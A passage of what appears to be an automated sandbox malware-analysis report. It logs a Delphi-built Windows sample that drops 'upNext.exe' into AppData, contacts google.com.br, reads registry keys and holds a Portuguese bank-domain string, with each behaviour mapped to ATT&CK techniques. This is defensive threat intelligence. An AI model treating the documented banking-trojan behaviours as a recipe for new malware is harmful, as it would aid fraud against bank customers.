ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-imVCn86AshUgJhdm5VXxIw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:56 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2d5GucwMmMLTQCbyiAEbtUoZytzsIHITExqFL6tQe-5LtKnYzx-o5Q; expires=Tue\n 05-Aug-2025 09:12:56 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=B7qHgMsCs0cOKNiPj2EneNWfkv0gxQ7e-qsRs-KzQRN2HykVDc79rGjkCrs_j6vwNJuD-SkaMO4KxepOFNY9rNXsiZw2045KWpVvwR60NgD95BSQrlCspH6fCxQ8Us3slqx8ihB3LcfiXrJpLMvc4d8V_tPg4Sws4W-sSrRuITgmtbbDMd6CCL0l54V-AgHda5sVa_dhaq1vDhk; expires=Fri\n 08-Aug-2025 09:12:56 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-7HYFQszyWTNy7FQK0Lb8RA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:57 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2e4XenvTzk6Hf-gT8DKRS813rrmxjXVu8Xiul2KIHvSSLeYKk2yjg; expires=Tue\n 05-Aug-2025 09:12:57 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=Vm2GYYl9YcAOeu82__51aBL1VwAagN-cexSrZGFvk4juhAqwx33bLn9v39HT7VAn6dWp_vc2xtGqaRBE5cESK5QU_z1-gCJgGR2sSEwHxSy_OHkmcNuASSwADW53yCKatbcgtV0i3a2av0-VzB04FLhbe5HypM5nGxOfuQGDoHMMJkvkl0pZAMHje9ZEgQrMh0iVlWYz1Huh-18; expires=Fri\n 08-Aug-2025 09:12:57 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-V22se-Vd8kkriygwAh730A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:57 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2fyFlcALSJxtT7z5Mjsf8dbEMtzqPoEOPnOvC-vfTEJQWNd1xby5Wk; expires=Tue\n 05-Aug-2025 09:12:57 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=UiA4u4B6MJPO8tiw9vJWz3Vd_i73Y58D419-Lb51WpzspSPhePYkFM2y0RkOanOfKa0cJ-9mmgqt9AWaUYXWsx2z-9vfJ-8Gu0RonyIsUpQ1khMpQZrV4L5J2HFKvT0J0lVa39lU8yfiiIn3OMoZ2x8D0R08teSJD1J3Sibxx5Woi7RFaDmTeCGUbmqnJVVMlnQ9kEeMuCdbnA; expires=Fri\n 08-Aug-2025 09:12:57 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-U-SHdSDd5fQrjmzuzGtWVQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:58 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2ceG-5AdoJxi_duqNbrGTSkBaBhBl3yywlmMGZk3l4lhjZ_VjNM0g; expires=Tue\n 05-Aug-2025 09:12:58 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=Qu6aRltYs2ji8gENJ4JBsy9I9waKd4WE4plgBUe0kMccyBerrPJ_xJ2JftAWJ7N2Nd5eMIzLJfn2qwvI4oxlOfOivPrx0XpwIi5nnxb-jdenNvlnC4dNa5wxyTV7nE4GKm2VgqAgSG4pTiPpQQUlHzYk3DPc3OxeFSzXDZUzbDPOU7GQu4LJ5Ju41Cn9gIsHBx1KDskWw5fS3RY; expires=Fri\n 08-Aug-2025 09:12:58 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-iIVBRgMMET7_eFJCIdd-Zg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:58 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2e8AuvFiK5BKE62cpZsPjz4Bw-Hd-kdqbM273Pzh47XN4FkZhPkyA; expires=Tue\n 05-Aug-2025 09:12:58 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=UJmw_aF61JUn2-_o5hMhdlEUMNgWlISt0I2NiDFu7PV4p1F35pX33b9n-PflqpuLJgGDqUT_Dvc7nsAu_xAQMlkwnRxCzSFSr46PPXPKQIkWy2DfVGz-hEB4WJDyug11T4cqICJ96sDmrlkdoYgr4qq3QXXswN4u6m6iHy8DkACIUhgovK2qOWUxNmqJnzBAKu4SxPRI1TMTOg; expires=Fri\n 08-Aug-2025 09:12:58 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-s5wNdcmFl9gBPNY2PtW2cw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:59 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2cnVXgG6cPw3Hp4HjY2MmG9sbLHEWlBD4VrJlOJnGSBgIA7KdDLyow; expires=Tue\n 05-Aug-2025 09:12:59 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=olmDvCggdoR9KyiUM1qumc_h8x1uIL4BHbGgCFwyonYSQWoQJiHzxhLy3milAew1md6qj6zxw9nbBAtgV8X6DpOL36ZgYBNVl596sU7n-SV0gdq8w3HVhGxVGdVxHOtpQjFZF0zIigRwwxI2TDcT8Ird6sDAo9qtWqw8inW7ZlCBMqttcMxpKx8dpVoeDCNQ3-TY2hs0vr-tzpY; expires=Fri\n 08-Aug-2025 09:12:59 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Cq6xVZmfJyhzqMAHK4KIRQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:59 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2erirTIthKkS617C5s3UN9BgbwDbr76lcJ-K2eLHmsupl09pHJVO4w; expires=Tue\n 05-Aug-2025 09:12:59 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=wO6zTW1_2Hd1IlAoE6t25G0hxzymoplQzqS4Pw8oAFZb5Ous8g5hN5BZrRyIfxNtq5uVNK5EWt6shgpQyf_VNq2V5n8hD6ZwH8YQ_0RhEyOTXrcUJifr-OfIkTpNS3_tumVe9loK-8qUkqTUC720wdGZHNgLgwz6iPYPAMY-g_AYQgn2MrulW72bHJ8RElO8xOlh0cV2NLonqQ; expires=Fri\n 08-Aug-2025 09:12:59 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-PAYrDJ0NQ1X8s8NjYoj3Sw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:00 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2czvEJFPYyj2CLK8Khoin3SrpUw0axBfdAp6PbZ6NQz3nAm9DYF9ts; expires=Tue\n 05-Aug-2025 09:13:00 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=NGKYpqsDvyNzOZXRENOclavUqH1fZY6PS8gi1SASAfM6K670ntHZUiF9Zv_mZWAMnFKPjLzb9fDwG_pLxQap7NnZwBASYSw_QB6Sv3IZFP4Nxior_m_AuR_Apo0FsSx8TDoBS5WTOaPcfdsquT4yldvQqlcW15QN_Jf5Ctb4ZnEMc9Umpscx2KQhn-thyod3RFC9fMVS67lXJQ; expires=Fri\n 08-Aug-2025 09:13:00 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-DzIR0-FLZKMQIjfQkmn0TQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:00 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2fZvP78zcQiJEJ53KpKzQQQ2DBLbP7UqE6pSxub-7S0Q2zlHnDvVD8; expires=Tue\n 05-Aug-2025 09:13:00 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=E8u2AB-jAaVVV7nsVwsUaiSSZ1VrMgGuaN0fXwiDRimFbowCKxEfH3tnuLwm6vUUrVZ5wEQ2u1nH7PdsP8gjL0hygTADTpuauiQ6oG0euDSgITWV8GTAaoftCPy0Dp3U1msPpq1R9kHMEp9_-_IkuI4gNeodCrplCu4Iazgj3ifOB1ppc6PgJ0Lsr1T3M5vmI3tQ1K4nYwtBu5U; expires=Fri\n 08-Aug-2025 09:13:00 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-uUziJ7yh1bDEdX0CPr4AAQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:13:01 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2dgNS2ltEJcTBYdJlFywZSIqXJDcGeFjtVh5_HqRkRbHagvlI2Hjdg; expires=Tue\n 05-Aug-2025 09:13:01 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=eafnTfrRvwe07g1wRTzCFDgWKcqa9bmdK3RuUdTS2E9EcsSoUAbnx0SkHnJdmRIPXBUsdU7E903KR2JGjQOHQHaUr1VQQMsjlyKGtRdCcl0W6_MW0A6iY13weOFCdVa59NsTMHQ2oQf6wg8hD19YoxaeMrrKb6apjSiwCU-hZEaCN6VR6FwaC13D-MVvzLyfaXBp3AslPBo6Ow; expires=Fri\n 08-Aug-2025 09:13:01 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"www.google.com.br\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"www.google.com.br\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9\" has an executable section named \"CODE\"\n \"upNext.exe.bin\" has an executable section named \"CODE\"\n \"upNext.tmp\" has an executable section named \"CODE\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9\" has an writable section named \"DATA\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9\" has an writable section named \"BSS\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9\" has an writable section named \".idata\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9\" has an writable section named \".tls\"\n \"upNext.exe.bin\" has an writable section named \"DATA\"\n \"upNext.exe.bin\" has an writable section named \"BSS\"\n \"upNext.exe.bin\" has an writable section named \".idata\"\n \"upNext.exe.bin\" has an writable section named \".tls\"\n \"upNext.tmp\" has an writable section named \"DATA\"\n \"upNext.tmp\" has an writable section named \"BSS\"\n \"upNext.tmp\" has an writable section named \".idata\"\n \"upNext.tmp\" has an writable section named \".tls\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-23", "type": 2, "relevance": 2, "name": "Detected known bank URL artifact", "description": "\"bes.pt\" (Source: 00000000-00001484.00000001.77567.004B0000.00000004.mdmp, Indicator: \"bes.pt\")\n \"bes.pt|axb|tpl.asp\" (Source: 00000000-00001484.00000001.77567.004B0000.00000004.mdmp, Indicator: \"bes.pt\")\n \"bes.pt\" (Source: 00000000-00005952.00000001.68078.00250000.00000004.mdmp, 00000000-00005952.00000002.70004.00250000.00000004.mdmp, 00000000-00005952.00000003.75527.00250000.00000004.mdmp, Indicator: \"bes.pt\")\n \"bes.pt|axb|tpl.asp\" (Source: 00000000-00005952.00000001.68078.00250000.00000004.mdmp, 00000000-00005952.00000002.70004.00250000.00000004.mdmp, 00000000-00005952.00000003.75527.00250000.00000004.mdmp, Indicator: \"bes.pt\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9\" was detected as \"Borland Delphi 4.0\"\n \"upNext.exe.bin\" was detected as \"Borland Delphi 4.0\"\n \"upNext.tmp\" was detected as \"Borland Delphi 4.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"upNext.exe\" - Location: [%LOCALAPPDATA%\\upNext.exe]- [targetUID: 00000000-00005952]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\version.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\wsock32.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\SHFolder.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.ENU.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.EN.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\olepro32.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\DNSAPI.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\rasadhlp.dll\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" reads file \"c:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" reads file \"c:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp\"\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" reads file \"c:\\windows\\fonts\\staticcache.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n 